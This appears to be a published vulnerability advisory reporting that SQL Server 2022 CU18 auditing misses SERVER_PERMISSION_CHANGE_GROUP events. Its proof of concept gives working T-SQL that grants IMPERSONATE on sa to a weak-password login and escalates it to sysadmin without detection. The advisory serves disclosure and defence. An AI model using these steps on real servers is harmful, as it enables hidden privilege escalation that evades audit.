📄 Microsoft SQL Server 2022 Missing Log Entry

Title: SQL Server 2022 Security Audit Failure Vulnerability
    Product:                   Microsoft SQL Server
    Affected Version(s):       2022  (RTM-CU18) (KB5050771) 
    Tested Version(s):         2022  (RTM-CU18) (KB5050771)
    Fix:                       This security bug will be fixed in a future cumulative update released by Microsoft 
    Risk Level:                Medium
    Author of Advisory:        Emad Al-Mousa
    
    Overview:
    
    native security auditing is an important facility used to track and monitor activities within the database based on pre-defined audit policies. These security audit policies are engineered
    by the vendor to capture sensitive actions that can potentially jeopardise your database system.
    
    *****************************************
    Vulnerability Details:
    
    In Microsoft SQL Server 2022, when configuring a security audit for "SERVER_PERMISSION_CHANGE_GROUP" ,  it doesn’t get recorded in the audit logs as expected and designed !
    
    
    *****************************************
    Proof of Concept (PoC):
    
    I will create a dummy local SQL authentication account and will call it “TIM”:
    
    USE [master]
    GO
    CREATE LOGIN [TIM] WITH PASSWORD=N'TIM', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
    GO
    
    Then, I will create the audit policy as shown below:
    
    USE [master]
    GO
    
    CREATE SERVER AUDIT [test-permission-change]
    TO FILE 
    (   FILEPATH = N'D:\SQLServer_2022\audit\'
        ,MAXSIZE = 0 MB
        ,MAX_ROLLOVER_FILES = 2147483647
        ,RESERVE_DISK_SPACE = OFF
    ) WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE, AUDIT_GUID = 'a2d718eb-2588-4d64-b7c9-249441e96d42')
    ALTER SERVER AUDIT [test-permission-change] WITH (STATE = ON)
    GO
    
    USE [master]
    GO
    
    CREATE SERVER AUDIT SPECIFICATION [AUDIT_SER_PERM_CHANGE]
    FOR SERVER AUDIT [test-permission-change]
    ADD (SERVER_PERMISSION_CHANGE_GROUP)
    WITH (STATE = ON)
    GO
    
    
    Per documentation: https://learn.microsoft.com/en-us/sql/relational-databases/security/auditing/sql-server-audit-action-groups-and-actions?view=sql-server-ver16
    
    SERVER_PERMISSION_CHANGE_GROUP: This event is raised when a GRANT, REVOKE, or DENY is issued for permissions in the server scope. 
    
    
    -- It's expected that configured security auditing will capture the following t-sql statement:
    
    GRANT IMPERSONATE ON LOGIN::sa TO TIM
    GO
    
    
    Unfortunately, the above t-sql command is NOT logged in audit logs !!
    
    This can be verified by querying audit logs:
    
    SELECT * FROM sys.fn_get_audit_file('D:\SQLServer_2022\audit\*',
    DEFAULT,
    DEFAULT) order by event_time desc
    GO
    
    
    So, now there is a back-door/weakness introduced in the SQL Server instance and it will not be detected. Database account TIM can now login and execute the following t-sql query to escalate his permission to SYSADMIN role successfully: 
    
    execute as login='sa'
    ALTER SERVER ROLE [sysadmin] ADD MEMBER [TIM]
    GO
    
    
    *****************************************
    References:
    https://databasesecurityninja.wordpress.com/2025/04/01/sql-server-vulnerability-audit-failure-for-server_permission_change_group-in-sql-server-2022/
    https://learn.microsoft.com/en-us/sql/relational-databases/security/auditing/sql-server-audit-action-groups-and-actions?view=sql-server-ver16